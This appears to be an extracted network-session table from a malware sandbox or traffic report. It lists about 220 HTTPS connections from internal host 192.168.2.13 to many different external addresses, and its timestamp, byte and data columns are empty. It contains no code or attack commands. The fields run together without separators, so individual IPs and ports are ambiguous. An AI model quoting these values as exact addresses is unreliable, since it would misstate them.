                                        17490192.168.2.133477864.114.28.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17491192.168.2.1354046105.111.89.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17492192.168.2.1360958176.2.198.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17493192.168.2.1341910158.183.77.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17494192.168.2.134918484.101.97.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17495192.168.2.133455613.17.30.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17496192.168.2.135585244.212.238.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17497192.168.2.1351560188.100.109.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17498192.168.2.1347822101.161.174.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17499192.168.2.134783847.160.8.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17500192.168.2.1358844123.50.200.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17501192.168.2.1356796117.115.108.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17502192.168.2.1337594121.113.206.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17503192.168.2.133819093.141.179.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17504192.168.2.135825827.146.70.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17505192.168.2.135947684.38.93.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17506192.168.2.1342322150.15.82.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17507192.168.2.136072635.140.50.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17508192.168.2.1354066151.234.58.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17509192.168.2.1350814121.135.13.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17510192.168.2.1355988200.8.235.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17511192.168.2.1357134124.98.223.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17512192.168.2.134796618.127.201.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17513192.168.2.135834664.81.208.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17514192.168.2.135807244.149.211.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17515192.168.2.1339742158.170.167.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17516192.168.2.134478077.84.19.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17517192.168.2.1343286161.200.118.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17518192.168.2.1339360108.120.157.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17519192.168.2.135914280.171.44.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17520192.168.2.1344202174.133.33.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17521192.168.2.13346501.49.204.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17522192.168.2.1355352173.80.74.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17523192.168.2.135730834.149.10.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17524192.168.2.1348088173.185.237.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17525192.168.2.134775650.78.53.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17526192.168.2.134415067.101.105.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17527192.168.2.134836448.255.116.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17528192.168.2.135056227.179.99.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17529192.168.2.135603020.69.113.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17530192.168.2.1344736207.108.149.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17531192.168.2.135511434.85.98.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17532192.168.2.134506054.91.171.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17533192.168.2.1337106142.194.114.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17534192.168.2.134813240.40.249.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17535192.168.2.1341724211.234.116.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17536192.168.2.135816478.89.200.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17537192.168.2.135013652.22.89.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17538192.168.2.1350640153.36.69.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17539192.168.2.135307074.202.10.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17540192.168.2.134333684.202.151.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17541192.168.2.134602478.111.12.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17542192.168.2.1359508176.255.115.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17543192.168.2.135189852.37.28.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17544192.168.2.133990086.50.38.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17545192.168.2.134633890.206.122.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17546192.168.2.1340938128.109.173.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17547192.168.2.1352066160.65.213.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17548192.168.2.1340274186.200.34.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17549192.168.2.134245693.164.12.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17550192.168.2.1338260117.101.34.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17551192.168.2.1345072126.134.255.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17552192.168.2.135112062.152.164.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17553192.168.2.1336158177.210.82.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17554192.168.2.135182273.251.39.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17555192.168.2.135172634.120.119.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17556192.168.2.135007034.61.41.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17557192.168.2.1344808140.44.223.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17558192.168.2.1346202222.227.31.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17559192.168.2.1357184184.244.161.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17560192.168.2.135480275.62.78.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17561192.168.2.135043688.115.122.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17562192.168.2.1347348210.238.195.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17563192.168.2.133980061.92.87.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17564192.168.2.1344256141.193.205.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17565192.168.2.1340844148.88.207.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17566192.168.2.13490882.159.82.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17567192.168.2.1346192117.17.202.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17568192.168.2.1352454121.13.183.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17569192.168.2.134662296.230.126.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17570192.168.2.135431067.29.220.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17571192.168.2.134569243.244.167.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17572192.168.2.1342274181.181.147.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17573192.168.2.1339458170.37.215.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17574192.168.2.135712424.57.180.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17575192.168.2.136057277.18.85.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17576192.168.2.1352386206.23.214.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17577192.168.2.1344618196.148.234.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17578192.168.2.134773036.225.190.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17579192.168.2.1333680201.226.248.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17580192.168.2.1345060159.156.43.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17581192.168.2.1358336182.23.59.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17582192.168.2.134692465.211.214.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17583192.168.2.1336006103.249.215.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17584192.168.2.134749079.110.236.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17585192.168.2.1342942187.89.140.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17586192.168.2.13437185.48.142.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17587192.168.2.133878017.169.67.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17588192.168.2.134991476.101.16.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17589192.168.2.134532252.203.18.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17590192.168.2.1333994124.84.237.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17591192.168.2.1353138203.229.134.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17592192.168.2.1341242213.202.48.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17593192.168.2.134797294.242.196.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17594192.168.2.1350674213.213.208.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17595192.168.2.1351310204.71.27.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17596192.168.2.1341564120.160.29.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17597192.168.2.1344612113.182.68.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17598192.168.2.135096250.95.28.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17599192.168.2.1339772100.35.9.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17600192.168.2.1333238195.43.39.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17601192.168.2.1352182119.102.31.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17602192.168.2.135664890.233.205.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17603192.168.2.133310665.115.129.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17604192.168.2.1348114189.117.214.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17605192.168.2.133387424.10.128.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17606192.168.2.1341464175.120.136.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17607192.168.2.1353320175.79.23.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17608192.168.2.1345192166.160.146.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17609192.168.2.135739027.114.109.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17610192.168.2.135053661.230.75.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17611192.168.2.1357608186.244.205.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17612192.168.2.1356624159.177.19.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17613192.168.2.1352928156.75.19.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17614192.168.2.1351508213.87.102.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17615192.168.2.1353966188.224.127.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17616192.168.2.134340268.72.154.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17617192.168.2.1359400147.101.252.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17618192.168.2.133809440.224.133.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17619192.168.2.134402474.154.208.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17620192.168.2.1342614139.227.85.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17621192.168.2.1357196121.220.160.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17622192.168.2.1351894131.133.215.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17623192.168.2.1352716189.126.15.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17624192.168.2.1345326200.98.12.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17625192.168.2.1335494136.78.19.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17626192.168.2.134980881.72.87.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17627192.168.2.13361384.65.16.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17628192.168.2.1334284129.84.133.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17629192.168.2.1345328154.177.161.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17630192.168.2.135211271.87.147.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17631192.168.2.1344314179.38.163.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17632192.168.2.135665849.95.186.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17633192.168.2.1356376120.102.92.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17634192.168.2.135214247.165.245.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17635192.168.2.135685880.196.22.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17636192.168.2.135743442.150.9.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17637192.168.2.1333398107.100.63.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17638192.168.2.134585062.175.250.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17639192.168.2.1347918159.254.145.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17640192.168.2.1335806186.133.242.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17641192.168.2.133320483.246.62.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17642192.168.2.1358484116.248.159.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17643192.168.2.1354082124.103.247.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17644192.168.2.1357788146.10.250.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17645192.168.2.1354718152.168.71.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17646192.168.2.133355883.138.146.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17647192.168.2.133900683.170.132.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17648192.168.2.1360014160.77.210.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17649192.168.2.135810838.216.115.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17650192.168.2.1360552128.26.61.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17651192.168.2.1352584154.60.100.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17652192.168.2.1360738152.52.74.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17653192.168.2.1333744144.237.221.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17654192.168.2.1357518176.213.10.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17655192.168.2.135015444.48.165.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17656192.168.2.135817073.32.45.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17657192.168.2.1345262135.183.116.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17658192.168.2.1349910101.66.188.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17659192.168.2.134985066.100.77.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17660192.168.2.1334796109.155.239.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17661192.168.2.1345708185.97.60.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17662192.168.2.133994074.162.167.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17663192.168.2.1343708151.62.227.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17664192.168.2.135754286.244.123.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17665192.168.2.135108813.2.159.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17666192.168.2.1347504103.57.232.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17667192.168.2.1359746139.241.98.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17668192.168.2.1340874218.29.93.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17669192.168.2.1336278192.90.131.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17670192.168.2.1343694139.125.169.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17671192.168.2.133663068.31.223.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17672192.168.2.135449062.128.189.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17673192.168.2.1358958102.245.227.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17674192.168.2.134878073.12.88.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17675192.168.2.1351320123.6.143.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17676192.168.2.1358428150.124.107.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17677192.168.2.1356274164.91.74.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17678192.168.2.1356568162.183.237.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17679192.168.2.133491881.27.28.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17680192.168.2.134950423.12.114.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17681192.168.2.1344920176.106.132.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17682192.168.2.1339012149.71.142.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17683192.168.2.1356748222.5.102.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17684192.168.2.135570664.2.115.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17685192.168.2.1345630190.240.139.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17686192.168.2.134812076.51.158.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17687192.168.2.1350682141.56.31.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17688192.168.2.135465027.61.240.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17689192.168.2.1337728186.233.44.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17690192.168.2.1348464203.47.171.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17691192.168.2.1355194156.179.127.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17692192.168.2.1340114148.16.55.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17693192.168.2.1339040189.68.81.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17694192.168.2.1337266162.31.104.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17695192.168.2.13534662.163.116.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17696192.168.2.1339506103.169.118.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17697192.168.2.134345037.100.148.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17698192.168.2.1345938181.183.154.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17699192.168.2.135534488.4.109.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17700192.168.2.135309273.224.25.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17701192.168.2.1343856163.127.245.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17702192.168.2.1350872174.49.94.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17703192.168.2.1338040188.69.174.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17704192.168.2.136098086.186.125.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17705192.168.2.1355182205.249.44.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17706192.168.2.133471689.181.172.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17707192.168.2.1343976103.37.12.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17708192.168.2.1340718155.122.109.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17709192.168.2.134879086.174.115.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17710192.168.2.1354708104.104.14.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17711192.168.2.133301437.215.22.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
